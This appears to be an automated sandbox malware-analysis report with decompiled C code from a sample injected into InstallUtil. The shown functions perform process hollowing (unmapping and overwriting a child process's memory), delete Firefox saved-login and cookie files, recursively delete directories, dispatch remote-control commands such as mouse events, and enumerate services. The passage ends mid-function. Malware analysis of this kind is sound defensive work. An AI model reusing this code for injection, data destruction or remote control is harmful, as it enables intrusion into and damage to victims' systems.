								L14:
								_t91 = _t101 + 0x34;
								if( *(_t111 + 0x10) ==  *_t91) {
									L17:
									_t108->Eax =  *((intOrPtr*)(_t101 + 0x28)) +  *(_t111 + 0x1c);
									if(SetThreadContext(_t105->hThread, _t108) == 0 || ResumeThread(_t105->hThread) == 0xffffffff) {
										goto L20;
									} else {
										_t47 = 1;
										goto L22;
									}
								}
								_t78 = WriteProcessMemory(_t105->hProcess, _t108->Ebx + 8, _t91, 4, 0);
								if(_t78 != 0) {
									goto L17;
								}
								TerminateProcess(_t105->hProcess, _t78);
								goto L21;
							}
							_t109 =  *(_t111 + 0x1c);
							_t97 = 0;
							 *(_t111 + 0x18) = 0;
							do {
								WriteProcessMemory( *_t105,  *((intOrPtr*)( *((intOrPtr*)(_t88 + 0x3c)) + _t97 + _t88 + 0x104)) + _t109,  *((intOrPtr*)( *((intOrPtr*)(_t88 + 0x3c)) + _t97 + _t88 + 0x10c)) + _t88,  *( *((intOrPtr*)(_t88 + 0x3c)) + _t97 + _t88 + 0x108), 0);
								_t95 =  *(_t111 + 0x14) + 1;
								_t97 =  *(_t111 + 0x18) + 0x28;
								 *(_t111 + 0x14) = _t95;
								 *(_t111 + 0x18) = _t97;
							} while (_t95 < ( *(_t101 + 6) & 0x0000ffff));
							_t108 =  *(_t111 + 0x20);
							goto L14;
						}
					}
				}
				return 0;
			}

0x00414ead
0x00414eb7
0x00414eb9
0x00414ec0
0x00414ecd
0x00414ed5
0x004150b8
0x004150b8
0x004150ba
0x00000000
0x004150ba
0x00414ee3
0x00414eeb
0x00414ef3
0x00414ef8
0x00414f14
0x00000000
0x00000000
0x00414f24
0x00414f2a
0x00414f30
0x00414f43
0x00414f46
0x00414f4a
0x00414f5c
0x00415092
0x00415096
0x004150a4
0x004150a9
0x004150b0
0x00000000
0x00414f85
0x00414f85
0x00414f89
0x00414f8e
0x00414f93
0x00414f99
0x00414f99
0x00414faa
0x00414fb0
0x00414fb6
0x00000000
0x00414fd3
0x00414fd3
0x00414fde
0x00415034
0x00415038
0x0041503d
0x00415065
0x0041506d
0x0041507e
0x00000000
0x0041508e
0x0041508e
0x00000000
0x0041508e
0x0041507e
0x00415050
0x00415058
0x00000000
0x00000000
0x0041505d
0x00000000
0x0041505d
0x00414fe0
0x00414fe4
0x00414fe6
0x00414fea
0x0041500e
0x0041501c
0x00415021
0x00415024
0x00415028
0x0041502c
0x00415030
0x00000000
0x00415030
0x00414fb6
0x00414f5c
0x00000000

APIs

CreateProcessW.KERNEL32 ref: 00414F0C
CloseHandle.KERNEL32(?,?,?,00000000,00000000), ref: 00414F24
CloseHandle.KERNEL32(?,?,?,00000000,00000000), ref: 00414F2A
CloseHandle.KERNEL32(?,?,?,00000000,00000000), ref: 00414F30
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,?,00000000,00000000), ref: 00414F3D
GetThreadContext.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00414F54
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,00000000), ref: 00414F77
NtUnmapViewOfSection.NTDLL(?,?), ref: 00414F93
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,00000000,00000000), ref: 00414FAA
WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 00414FC5

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$AllocMemoryVirtual$ContextCreateReadSectionThreadUnmapViewWrite
String ID:
API String ID: 2984983542-0
Opcode ID: 0a606e4c10bda653f35c90aec8ad58a165c11598e3c1b7c18cf6d0dd9d803b5e
Instruction ID: 06e4aad082d7c99cc54990fdc0c2b22256374dd00a3d860c03ff13362412e12b
Opcode Fuzzy Hash: 0a606e4c10bda653f35c90aec8ad58a165c11598e3c1b7c18cf6d0dd9d803b5e
Instruction Fuzzy Hash: D551BF70200701EFD7209F65CC45FAABBE9FF8870AF004429FA84DA2A1D775E895CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1C4 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040A1C4(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAA _v468;
				void* __esi;
				void* __ebp;
				void* _t41;
				signed int _t55;
				signed int _t57;
				int _t71;
				int _t73;
				void* _t132;
				void* _t133;
				void* _t134;
				void* _t135;
				void* _t136;

				_t141 = __eflags;
				_t132 = __edi;
				_t86 = __ebx;
				E0040209F(__ebx,  &_v100);
				E0040209F(__ebx,  &_v76);
				E0040209F(__ebx,  &_v28);
				_t41 = E00402053(_t86,  &_v124, __edx, _t135, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00401FA2( &_v28, _t42, _t133, E004052D4(_t86,  &_v52, E00438A1A(_t86, __eflags, "UserProfile"), _t135, _t141, _t41));
				E00401F98();
				E00401F98();
				_t128 =  &_v28;
				_t134 = FindFirstFileA(E00401F6B(E0040795C( &_v124,  &_v28, _t135, "*")),  &_v468);
				E00401F98();
				_t142 = _t134 - 0xffffffff;
				if(_t134 != 0xffffffff) {
					while(1) {
						__eflags = FindNextFileA(_t134,  &_v468);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v468.dwFileAttributes & 0x00000010;
						if((_v468.dwFileAttributes & 0x00000010) != 0) {
							_t55 = E00438EB0( &(_v468.cFileName), ".");
							__eflags = _t55;
							if(_t55 != 0) {
								_t57 = E00438EB0( &(_v468.cFileName), "..");
								__eflags = _t57;
								if(_t57 != 0) {
									E00401FA2( &_v100, _t59, _t134, E0040793B(_t86,  &_v52, E0040795C( &_v148,  &_v28, _t135,  &(_v468.cFileName)), _t132, _t135, __eflags, "\\logins.json"));
									E00401F98();
									E00401F98();
									_t128 = E0040795C( &_v52,  &_v28, _t135,  &(_v468.cFileName));
									E00401FA2( &_v76, _t65, _t134, E0040793B(_t86,  &_v148, _t65, _t132, _t135, __eflags, "\\key3.db"));
									E00401F98();
									E00401F98();
									_t71 = DeleteFileA(E00401F6B( &_v100));
									__eflags = _t71;
									if(_t71 == 0) {
										GetLastError();
									}
									_t73 = DeleteFileA(E00401F6B( &_v76));
									__eflags = _t73;
									if(_t73 == 0) {
										GetLastError();
									}
								}
							}
						}
					}
					E00402053(_t86, _t136 - 0x18, _t128, _t135, "\n[Firefox StoredLogins Cleared!]");
					E0040A863(_t86, _t128, _t135, __eflags);
					FindClose(_t134);
					goto L11;
				} else {
					FindClose(_t134);
					E00402053(_t86, _t136 - 0x18,  &_v28, _t135, "\n[Firefox StoredLogins not found]");
					E0040A863(_t86,  &_v28, _t135, _t142);
					L11:
					E00401F98();
					E00401F98();
					E00401F98();
					return 1;
				}
			}

0x0040a1c4
0x0040a1c4
0x0040a1c4
0x0040a1d1
0x0040a1d9
0x0040a1e1
0x0040a1ee
0x0040a20e
0x0040a216
0x0040a21e
0x0040a22f
0x0040a24c
0x0040a24e
0x0040a253
0x0040a256
0x0040a378
0x0040a386
0x0040a388
0x00000000
0x00000000
0x0040a27f
0x0040a286
0x0040a298
0x0040a29f
0x0040a2a1
0x0040a2b3
0x0040a2ba
0x0040a2bc
0x0040a2ec
0x0040a2f4
0x0040a2ff
0x0040a31c
0x0040a32e
0x0040a339
0x0040a341
0x0040a34f
0x0040a355
0x0040a357
0x0040a359
0x0040a359
0x0040a368
0x0040a36e
0x0040a370
0x0040a372
0x0040a372
0x0040a370
0x0040a2bc
0x0040a2a1
0x0040a286
0x0040a398
0x0040a39d
0x0040a3a6
0x00000000
0x0040a25c
0x0040a25d
0x0040a26d
0x0040a272
0x0040a3ac
0x0040a3af
0x0040a3b7
0x0040a3bf
0x0040a3ca
0x0040a3ca

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A243
FindClose.KERNEL32(00000000), ref: 0040A25D
FindNextFileA.KERNEL32(00000000,?), ref: 0040A380
FindClose.KERNEL32(00000000), ref: 0040A3A6

Strings

\key3.db, xrefs: 0040A30A
[Firefox StoredLogins Cleared!], xrefs: 0040A393
UserProfile, xrefs: 0040A1F4
\logins.json, xrefs: 0040A2C8
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040A1E6
[Firefox StoredLogins not found], xrefs: 0040A268

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: b96d7b6a9e7f65f2659a1d0a2429fabee549dc62b67f20ac5f3d8dc4a256c99a
Instruction ID: e44b73d3c1934ffc166f3e956c94ee971eb84255be0dce4f1a5aaa44fccd639b
Opcode Fuzzy Hash: b96d7b6a9e7f65f2659a1d0a2429fabee549dc62b67f20ac5f3d8dc4a256c99a
Instruction Fuzzy Hash: E751903190421A9ADB14F7B1DC5ADEEB734AF11309F40047FF406B60E2EF385A86CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3CB Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040A3CB(void* __edx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				struct _WIN32_FIND_DATAA _v444;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t30;
				signed int _t44;
				signed int _t46;
				long _t60;
				void* _t68;
				void* _t69;
				void* _t98;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;

				_t112 = __eflags;
				_t103 = __edi;
				E0040209F(_t68,  &_v52);
				E0040209F(_t68,  &_v28);
				_t30 = E00402053(_t68,  &_v100, __edx, _t106, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00401FA2( &_v28, _t31, _t104, E004052D4(_t68,  &_v76, E00438A1A(_t68, __eflags, "UserProfile"), _t106, _t112, _t30));
				E00401F98();
				E00401F98();
				_t101 =  &_v28;
				_t105 = FindFirstFileA(E00401F6B(E0040795C( &_v100,  &_v28, _t106, "*")),  &_v444);
				E00401F98();
				_t113 = _t105 - 0xffffffff;
				if(_t105 != 0xffffffff) {
					while(1) {
						__eflags = FindNextFileA(_t105,  &_v444);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v444.dwFileAttributes & 0x00000010;
						if((_v444.dwFileAttributes & 0x00000010) == 0) {
							continue;
						} else {
							_t44 = E00438EB0( &(_v444.cFileName), ".");
							__eflags = _t44;
							if(_t44 == 0) {
								continue;
							} else {
								_t46 = E00438EB0( &(_v444.cFileName), "..");
								__eflags = _t46;
								if(_t46 == 0) {
									continue;
								} else {
									_t101 = E0040795C( &_v124,  &_v28, _t106,  &(_v444.cFileName));
									E00401FA2( &_v52, _t48, _t105, E0040793B(_t68,  &_v76, _t48, _t103, _t106, __eflags, "\\cookies.sqlite"));
									E00401F98();
									E00401F98();
									__eflags = DeleteFileA(E00401F6B( &_v52));
									if(__eflags != 0) {
										_t98 = _t107 - 0x18;
										_push("\n[Firefox cookies found, cleared!]");
										goto L2;
									} else {
										_t60 = GetLastError();
										__eflags = _t60 != 0;
										if(_t60 != 0) {
											FindClose(_t105);
											_t69 = 0;
										} else {
											continue;
										}
									}
								}
							}
						}
						goto L11;
					}
					E00402053(_t68, _t107 - 0x18, _t101, _t106, "\n[Firefox Cookies not found]");
					E0040A863(_t68, _t101, _t106, __eflags);
					FindClose(_t105);
					goto L10;
				} else {
					FindClose(_t105);
					_t98 = _t107 - 0x18;
					_push("\n[Firefox Cookies not found]");
					L2:
					E00402053(_t68, _t98, _t101, _t106);
					E0040A863(_t68, _t101, _t106, _t113);
					L10:
					_t69 = 1;
				}
				L11:
				E00401F98();
				E00401F98();
				return _t69;
			}

0x0040a3cb
0x0040a3cb
0x0040a3d9
0x0040a3e1
0x0040a3ee
0x0040a40e
0x0040a416
0x0040a41e
0x0040a42f
0x0040a44c
0x0040a44e
0x0040a453
0x0040a456
0x0040a515
0x0040a523
0x0040a525
0x00000000
0x00000000
0x0040a47f
0x0040a486
0x00000000
0x0040a48c
0x0040a498
0x0040a49f
0x0040a4a1
0x00000000
0x0040a4a3
0x0040a4af
0x0040a4b6
0x0040a4b8
0x00000000
0x0040a4ba
0x0040a4d2
0x0040a4e1
0x0040a4e9
0x0040a4f1
0x0040a505
0x0040a507
0x0040a571
0x0040a573
0x00000000
0x0040a509
0x0040a509
0x0040a510
0x0040a513
0x0040a564
0x0040a56a
0x00000000
0x00000000
0x00000000
0x0040a513
0x0040a507
0x0040a4b8
0x0040a4a1
0x00000000
0x0040a486
0x0040a535
0x0040a53a
0x0040a543
0x00000000
0x0040a45c
0x0040a45d
0x0040a466
0x0040a468
0x0040a46d
0x0040a46d
0x0040a472
0x0040a549
0x0040a549
0x0040a549
0x0040a54b
0x0040a54e
0x0040a556
0x0040a562

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A443
FindClose.KERNEL32(00000000), ref: 0040A45D
FindNextFileA.KERNEL32(00000000,?), ref: 0040A51D
FindClose.KERNEL32(00000000), ref: 0040A543
FindClose.KERNEL32(00000000), ref: 0040A564

Strings

[Firefox Cookies not found], xrefs: 0040A468, 0040A530
UserProfile, xrefs: 0040A3F4
[Firefox cookies found, cleared!], xrefs: 0040A573
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040A3E6
\cookies.sqlite, xrefs: 0040A4C0

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: 73f8cabd20a158d6d28a4cf4a98449d0163523ed5fbe7805c789c52e04fbc39f
Instruction ID: 2636070b19bc4f96a2ba253f04164ebc2b10d63ba6bf9f4624471e1a105ae2bd
Opcode Fuzzy Hash: 73f8cabd20a158d6d28a4cf4a98449d0163523ed5fbe7805c789c52e04fbc39f
Instruction Fuzzy Hash: 89419C3190431A6ACB04F7B1DC5A8EE7768AF51349F54007FF402B60E2FF385A46CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 004187B1 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004187B1(WCHAR* __ecx, void* __edx) {
				short _v524;
				short _v1044;
				struct _WIN32_FIND_DATAW _v1636;
				int _t41;
				long _t42;
				int _t51;
				signed int _t60;
				void* _t70;
				WCHAR* _t71;
				void* _t72;

				_t70 = __edx;
				_t71 = __ecx;
				E00439346( &_v1044, __ecx);
				E0043DE96( &_v1044, L"\\*");
				E00439346( &_v524, _t71);
				E0043DE96( &_v524, "\\");
				_t72 = FindFirstFileW( &_v1044,  &_v1636);
				if(_t72 == 0xffffffff) {
					L16:
					__eflags = 0;
					return 0;
				}
				E00439346( &_v1044,  &_v524);
				_t60 = 1;
				do {
					_t41 = FindNextFileW(_t72,  &_v1636);
					_t76 = _t41;
					if(_t41 == 0) {
						_t42 = GetLastError();
						__eflags = _t42 - 0x12;
						if(_t42 != 0x12) {
							L15:
							FindClose(_t72);
							goto L16;
						}
						_t60 = 0;
						__eflags = 0;
						goto L13;
					}
					if(E00418783( &(_v1636.cFileName), _t76) != 0) {
						goto L13;
					}
					E0043DE96( &_v524,  &(_v1636.cFileName));
					if((_v1636.dwFileAttributes & 0x00000010) == 0) {
						__eflags = _v1636.dwFileAttributes & 0x00000001;
						if((_v1636.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v524, 0x80);
						}
						_t51 = DeleteFileW( &_v524);
						__eflags = _t51;
						if(_t51 == 0) {
							goto L15;
						} else {
							L10:
							E00439346( &_v524,  &_v1044);
							goto L13;
						}
					}
					if(E004187B1( &_v524, _t70) == 0) {
						goto L15;
					}
					RemoveDirectoryW( &_v524);
					goto L10;
					L13:
				} while (_t60 != 0);
				FindClose(_t72);
				return RemoveDirectoryW(_t71);
			}

0x004187b1
0x004187c3
0x004187c7
0x004187d8
0x004187e5
0x004187f6
0x00418812
0x00418817
0x00418908
0x00418908
0x00000000
0x00418908
0x0041882b
0x00418832
0x00418834
0x0041883c
0x00418842
0x00418844
0x004188dc
0x004188e2
0x004188e5
0x00418901
0x00418902
0x00000000
0x00418902
0x004188e7
0x004188e7
0x00000000
0x004188e7
0x00418857
0x00000000
0x00000000
0x0041886b
0x00418879
0x00418899
0x004188a0
0x004188ae
0x004188ae
0x004188bb
0x004188c1
0x004188c3
0x00000000
0x004188c5
0x004188c5
0x004188d3
0x00000000
0x004188d9
0x004188c3
0x00418888
0x00000000
0x00000000
0x00418891
0x00000000
0x004188e9
0x004188e9
0x004188f2
0x00000000

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,0046E5A0,00000001), ref: 0041880C
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0046E5A0,00000001), ref: 0041883C
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,0046E5A0,00000001), ref: 004188AE
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,0046E5A0,00000001), ref: 004188BB

Part of subcall function 004187B1: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,0046E5A0,00000001), ref: 00418891

GetLastError.KERNEL32(?,?,?,?,?,?,0046E5A0,00000001), ref: 004188DC
FindClose.KERNEL32(00000000,?,?,?,?,?,?,0046E5A0,00000001), ref: 004188F2
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,0046E5A0,00000001), ref: 004188F9
FindClose.KERNEL32(00000000,?,?,?,?,?,?,0046E5A0,00000001), ref: 00418902

Strings

pth_unenc, xrefs: 004187B1

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID: pth_unenc
API String ID: 2341273852-4028850238
Opcode ID: a684b848678f86dc8a92b9bd8f927cf206f938293d51880feeffef5f7a3b709a
Instruction ID: a0eb9dbcb626f7873b29ebf737b5565244f521a17c4af58c68e042bea313a5a1
Opcode Fuzzy Hash: a684b848678f86dc8a92b9bd8f927cf206f938293d51880feeffef5f7a3b709a
Instruction Fuzzy Hash: A931B37280422C9ADB20EBA1DC49EEB73BCAF44309F4406EFF514D2151EF79DAC48A59

Uniqueness

Uniqueness Score: -1.00%

Function 00415E25 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00415E25(signed int __edx, void* __eflags, char _a8) {
				void* _v28;
				char _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				signed char* _t64;
				char* _t65;
				signed char* _t66;
				intOrPtr* _t71;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t83;
				intOrPtr* _t85;
				char* _t90;
				char* _t91;
				char* _t92;
				intOrPtr* _t93;
				signed char* _t95;
				char* _t96;
				intOrPtr _t98;
				signed int _t108;
				void* _t111;
				signed int _t114;
				signed int _t122;
				signed int _t131;
				signed int _t148;

				_t98 =  *((intOrPtr*)(E004051BA(0)));
				E00404162( &_a8,  &_v32, 1, 0xffffffff);
				if(_t98 != 0x30) {
					__eflags = _t98 - 0x31;
					if(_t98 != 0x31) {
						__eflags = _t98 - 0x32;
						if(_t98 != 0x32) {
							__eflags = _t98 - 0x33;
							if(_t98 != 0x33) {
								__eflags = _t98 - 0x34;
								if(_t98 != 0x34) {
									__eflags = _t98 - 0x35;
									if(_t98 != 0x35) {
										__eflags = _t98 - 0x36;
										if(_t98 != 0x36) {
											__eflags = _t98 - 0x37;
											if(_t98 == 0x37) {
												_t64 = E004051BA(2);
												_t65 = E004051BA(1);
												_t66 = E004051BA(0);
												_t108 =  *_t64 & 0x000000ff;
												__eflags =  *_t65;
												_push(_t108);
												_t55 =  *_t65 != 0;
												__eflags = _t55;
												_push((_t108 & 0xffffff00 | _t55) & 0x000000ff);
												_t111 = 0x46ea50;
												goto L18;
											}
										} else {
											_push(0);
											_push(0x78);
											goto L15;
										}
									} else {
										_push(0);
										_push(0xffffff88);
										L15:
										mouse_event(0x800, 0, 0, ??, ??);
									}
								} else {
									_v40 =  *((intOrPtr*)(E004051BA(0)));
									_t71 = E004051BA(4);
									_t114 =  *0x46de68; // 0x0
									_v40 =  *_t71;
									E00415CC4( *((intOrPtr*)(0x46dd68 + _t114 * 4)),  &_v44, __eflags,  &_v40);
									E0041614C(_v44, _v40);
								}
							} else {
								_t76 = E004051BA(0);
								_v44 =  *((intOrPtr*)(E004051BA(4)));
								_t78 = E004051BA(8);
								_t122 =  *0x46de68; // 0x0
								_v44 =  *_t78;
								E00415CC4( *((intOrPtr*)(0x46dd68 + _t122 * 4)),  &_v48, __eflags,  &_v44);
								E004160E9( *_t76, _v48, _v44);
								goto L8;
							}
						} else {
							_t83 = E004051BA(0);
							_v40 =  *((intOrPtr*)(E004051BA(4)));
							_t85 = E004051BA(8);
							_t131 =  *0x46de68; // 0x0
							_v48 =  *_t85;
							E00415CC4( *((intOrPtr*)(0x46dd68 + _t131 * 4)),  &_v44, __eflags,  &_v48);
							E00416086( *_t83, _v44, _v48);
							goto L8;
						}
					} else {
						_t90 = E004051BA(4);
						_t91 = E004051BA(3);
						_t92 = E004051BA(2);
						_t93 = E004051BA(0);
						 *_t90 =  *_t91;
						__eflags =  *_t92;
						E0041618D( *_t93, __edx & 0xffffff00 |  *_t92 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t90 != 0x00000000) & 0 |  *_t91 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t90 != 0x00000000) & 0x000000ff);
						L8:
					}
				} else {
					_t95 = E004051BA(2);
					_t96 = E004051BA(1);
					_t66 = E004051BA(0);
					_t148 =  *_t95 & 0x000000ff;
					_t177 =  *_t96;
					_push(_t148);
					_push((_t148 & 0xffffff00 |  *_t96 != 0x00000000) & 0x000000ff);
					_t111 = 0x46e998;
					L18:
					_push( *_t66 & 0x000000ff);
					E00415388(_t111, _t177);
				}
				E00401F98();
				E00401F98();
				return 0;
			}

0x00415e43
0x00415e4a
0x00415e52
0x00415e91
0x00415e94
0x00415ef0
0x00415ef3
0x00415f50
0x00415f53
0x00415fb4
0x00415fb7
0x00416005
0x00416008
0x0041600f
0x00416012
0x00416026
0x00416029
0x00416031
0x0041603e
0x0041604b
0x00416050
0x00416053
0x00416056
0x00416057
0x00416057
0x0041605d
0x0041605e
0x00000000
0x0041605e
0x00416014
0x00416014
0x00416015
0x00000000
0x00416015
0x0041600a
0x0041600a
0x0041600b
0x00416017
0x0041601e
0x0041601e
0x00415fb9
0x00415fcb
0x00415fcf
0x00415fd4
0x00415fe7
0x00415ff0
0x00415ffe
0x00415ffe
0x00415f55
0x00415f5a
0x00415f70
0x00415f78
0x00415f7d
0x00415f90
0x00415f99
0x00415fa9
0x00000000
0x00415fa9
0x00415ef5
0x00415efa
0x00415f10
0x00415f18
0x00415f1d
0x00415f30
0x00415f39
0x00415f49
0x00000000
0x00415f49
0x00415e96
0x00415e9c
0x00415ea9
0x00415eb6
0x00415ec3
0x00415ece
0x00415ed8
0x00415ee5
0x00415fae
0x00415fae
0x00415e54
0x00415e5a
0x00415e67
0x00415e74
0x00415e79
0x00415e7c
0x00415e7f
0x00415e86
0x00415e87
0x00416063
0x00416066
0x00416067
0x00416067
0x00416070
0x00416078
0x00416085

Strings

6, xrefs: 0041600F
7, xrefs: 00416026
1, xrefs: 00415E91
5, xrefs: 00416005
2, xrefs: 00415EF0
4, xrefs: 00415FB4
3, xrefs: 00415F50
0, xrefs: 00415E4F

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7
API String ID: 0-3177665633
Opcode ID: 03473a701112d158429d20a5b3fa9ecc28fe072575c94d482568d119f3c302fb
Instruction ID: ce3f6f530eaf373da6f57d2a16164b96a2751c958d23b8e0be05e5def7443d4d
Opcode Fuzzy Hash: 03473a701112d158429d20a5b3fa9ecc28fe072575c94d482568d119f3c302fb
Instruction Fuzzy Hash: 206114709093019FE714EF20D891BEB77A5EF94310F04481EF5926B2D1EB389949CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00416FC6 Relevance: 15.2, APIs: 10, Instructions: 228
serviceCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00416FC6(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t100;
				void* _t107;
				int _t108;
				long _t110;
				void* _t133;
				void* _t194;
				short** _t195;
				int _t196;
				struct _ENUM_SERVICE_STATUS* _t197;
				int _t198;
				struct _QUERY_SERVICE_CONFIG* _t201;
				void* _t202;

				_t185 = __edx;
				_t200 = 0;
				_t194 = __ecx;
				 *((intOrPtr*)(_t202 + 0x3c)) = __ecx;
				_t133 = OpenSCManagerA(0, 0, 4);
				if(_t133 != 0) {
					_t135 = _t202 + 0x4c;
					E00401F46(_t133, _t202 + 0x4c);
					 *(_t202 + 0x18) = 0;
					 *(_t202 + 0x18) = 0;
					 *(_t202 + 0x28) = 0;
					__eflags = EnumServicesStatusW(_t133, 0x3b, 3, _t202 + 0xa4, 0, _t202 + 0x20, _t202 + 0x18, _t202 + 0x20);
					if(__eflags != 0) {
						L12:
						CloseServiceHandle(_t133);
						E00403222(_t133, _t194, _t200, __eflags, _t202 + 0x4c);
						E00401EC9();
						L13:
						return _t194;
					}
					__eflags = GetLastError() - 0xea;
					if(__eflags != 0) {
						goto L12;
					}
					_t196 =  *(_t202 + 0x18);
					_push(_t196);
					_t200 = E00438691(_t135);
					 *(_t202 + 0x30) = _t200;
					EnumServicesStatusW(_t133, 0x3b, 3, _t200, _t196, _t202 + 0x20, _t202 + 0x18, _t202 + 0x20);
					_t197 = 0;
					 *(_t202 + 0x28) = 0;
					__eflags =  *(_t202 + 0x14);
					if(__eflags <= 0) {
						L11:
						L0043868C(_t200);
						goto L12;
					}
					_t195 = _t200;
					_t201 =  *(_t202 + 0x2c);
					do {
						E0040321D(E004042BC(_t133, _t202 + 0x64, _t195[1], _t201, __eflags, E0040413E(_t133, _t202 + 0x38, _t185, _t201, 0x467488)));
						E00401EC9();
						E00401EC9();
						E0040321D(E004042BC(_t133, _t202 + 0x34,  *_t195, _t201, __eflags, E0040413E(_t133, _t202 + 0x68, _t195[1], _t201, 0x467488)));
						E00401EC9();
						E00401EC9();
						_t100 = E0040413E(_t133, _t202 + 0x80,  *_t195, _t201, 0x467488);
						_t185 = E0041834A(_t133, _t202 + 0x64, _t195[3]);
						E0040321D(E00402F65(_t202 + 0x38, _t101, _t100));
						E00401EC9();
						E00401EC9();
						E00401EC9();
						 *(_t202 + 0x1c) =  *(_t202 + 0x1c) & 0x00000000;
						_t107 = OpenServiceW(_t133,  *_t195, 1);
						_t160 = _t202 + 0x1c;
						 *(_t202 + 0x24) = _t107;
						_t108 = QueryServiceConfigW(_t107, _t201, 0, _t202 + 0x1c);
						__eflags = _t108;
						if(_t108 == 0) {
							_t110 = GetLastError();
							__eflags = _t110 - 0x7a;
							if(_t110 == 0x7a) {
								_t198 =  *(_t202 + 0x1c);
								_push(_t198);
								_t201 = E00438691(_t160);
								QueryServiceConfigW( *(_t202 + 0x30), _t201, _t198, _t202 + 0x1c);
								E0040321D(E00402FD4(_t133, _t202 + 0x80, E0041834A(_t133, _t202 + 0x34,  *_t201), _t195, _t201, __eflags, 0x467488));
								E00401EC9();
								E00401EC9();
								E0040321D(E00402FD4(_t133, _t202 + 0x80, E0041834A(_t133, _t202 + 0x34,  *((intOrPtr*)(_t201 + 4))), _t195, _t201, __eflags, 0x467488));
								E00401EC9();
								E00401EC9();
								_t185 = E004042BC(_t133, _t202 + 0x38,  *((intOrPtr*)(_t201 + 0xc)), _t201, __eflags, E0040413E(_t133, _t202 + 0x6c, _t119, _t201, 0x467488));
								E0040321D(E00402FD4(_t133, _t202 + 0x80, _t125, _t195, _t201, __eflags, "\n"));
								E00401EC9();
								E00401EC9();
								E00401EC9();
								L0043868C(_t201);
								_t197 =  *(_t202 + 0x2c);
							}
						}
						CloseServiceHandle( *(_t202 + 0x24));
						_t197 = _t197 + 1;
						_t195 =  &(_t195[9]);
						 *(_t202 + 0x28) = _t197;
						__eflags = _t197 -  *(_t202 + 0x14);
					} while (__eflags < 0);
					_t194 =  *(_t202 + 0x30);
